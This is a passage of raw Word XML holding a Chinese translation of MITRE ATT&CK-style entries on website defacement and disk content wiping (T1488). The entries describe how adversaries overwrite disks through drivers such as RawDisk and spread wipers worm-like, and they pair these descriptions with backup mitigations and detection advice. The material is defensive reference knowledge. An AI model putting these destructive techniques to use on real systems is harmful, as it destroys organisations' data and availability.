          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>顺从随附</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>的消息。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尽管网页置换</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暴露了攻击者的存在，但它通常发生在其他入侵目标完成之后。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC5DCE7" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>外部</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B831C8" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="scite-citeref-number"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>是攻击者和黑客团体</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实施网页置换攻击的常见目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目的是发布政治信息或展开宣传。网页置换</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>是事件的催化剂，或</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>回应组织或政府</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>行动。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网页置换攻击也可能其它</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>攻击（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如网页木马攻陷</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的骗局</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先兆</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755A9168" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="7756"/>
      </w:tblGrid>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00567ECD" w14:paraId="6B356AB3" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2E893520" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00567ECD" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="60C7C74B" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00567ECD" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00A65911" w14:paraId="7E463D4A" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B4B48CA" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId259" w:history="1">
              <w:r w:rsidR="00567ECD" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>数据备份</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12345FA7" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>考虑实施</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IT</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>容灾计划，包括可用于恢复组织数据的定期数据备份过程。确保备份数据存储在系统之外并且受到保护，以防攻击者使用常见方法访问、破坏并阻止备份数据恢复。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67AA45DA" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A46B3B6" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5568F5BA" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控内外部网站上计划外的内容修改。监控应用日志中来查看是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>有异常行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示攻击者执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>尝试或</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已取得</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>成功</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>深度数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>检查来</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看常见漏洞攻击的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>副产物，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用防火墙可以检测到与漏洞攻击企图相关的不恰当输入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E34AD44" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DE0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>磁盘内容擦除</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="22ECC3BE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15E7CD24" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="008A3AA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve"> T1488</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78B5A3D5" w14:textId="30410807" w:rsidR="00A0413E" w:rsidRPr="008A3AA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>恶劣</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>影响</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B5B26B3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="008A3AA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22E898D7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="008A3AA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>, root</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="503C34AA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="008A3AA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>内核驱动，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30BD3F51" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="008A3AA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>影响类型：可用性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6732CCEE" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="701E1E79" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00351FC1" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E83E89D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以擦除特定系统上的存储的内容以及网络中的大量系统以中断系统和网络资源的可用性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357FB52A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能部分或完全覆盖存储设备的内容，使得数据无法通过存储接口恢复。具有破坏性意图的攻击者可能会擦除磁盘内容的任意部分，而不是擦除特定的磁盘结构或文件。为了擦除磁盘内容，攻击者可以获得对硬盘驱动器的直接访问，以便用随机数据覆盖任意大小的磁盘部分。已经观察到攻击者利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RawDisk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等第三方驱动程序直接访问磁盘内容。此行为与数据销毁不同，因为磁盘的部分已删除而不是单个文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F55D5D5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A270AB" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了最大限度地提高对网络可用性中断的目标组织的影响，用于擦除磁盘内容的恶意软件可能具有类似蠕虫的功能，可通过利用其他技术（如有效帐户，凭据转储和</w:t>
      </w:r>
      <w:r w:rsidRPr="00480999">
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理员共享）在网络中传播。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF95AD2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="7473"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w14:paraId="1C9912EE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="383"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6B1DE94D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="758C25F5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w14:paraId="71E0DCF0" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3777EFBB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00480999">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据备份</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F34A66A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00480999">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>考虑实施</w:t>
            </w:r>
            <w:r w:rsidRPr="00480999">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IT</w:t>
            </w:r>
            <w:r w:rsidRPr="00480999">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>灾难恢复计划，其中包含用于执行可用于还原组织数据的常规数据备份的过程。</w:t>
            </w:r>
            <w:r w:rsidRPr="00480999">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00480999">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保备份存储在系统之外，并受到保护，以防止攻击者可能使用常用方法获取访问权限并销毁备份以防止恢复。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A88D860" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE1B803" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控对</w:t>
      </w:r>
      <w:r w:rsidRPr="00854077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>敏感位置（如分区引导扇区或</w:t>
      </w:r>
      <w:r w:rsidRPr="00854077">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BIOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00854077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数块</w:t>
      </w:r>
      <w:r w:rsidRPr="00854077">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00854077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>超级块）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00854077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00854077">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00854077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入。</w:t>
      </w:r>
      <w:r w:rsidRPr="00854077">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00854077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视异常内核驱动程序安装活动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445D1C76" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DE0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>磁盘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结构</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80DE0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>擦除</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
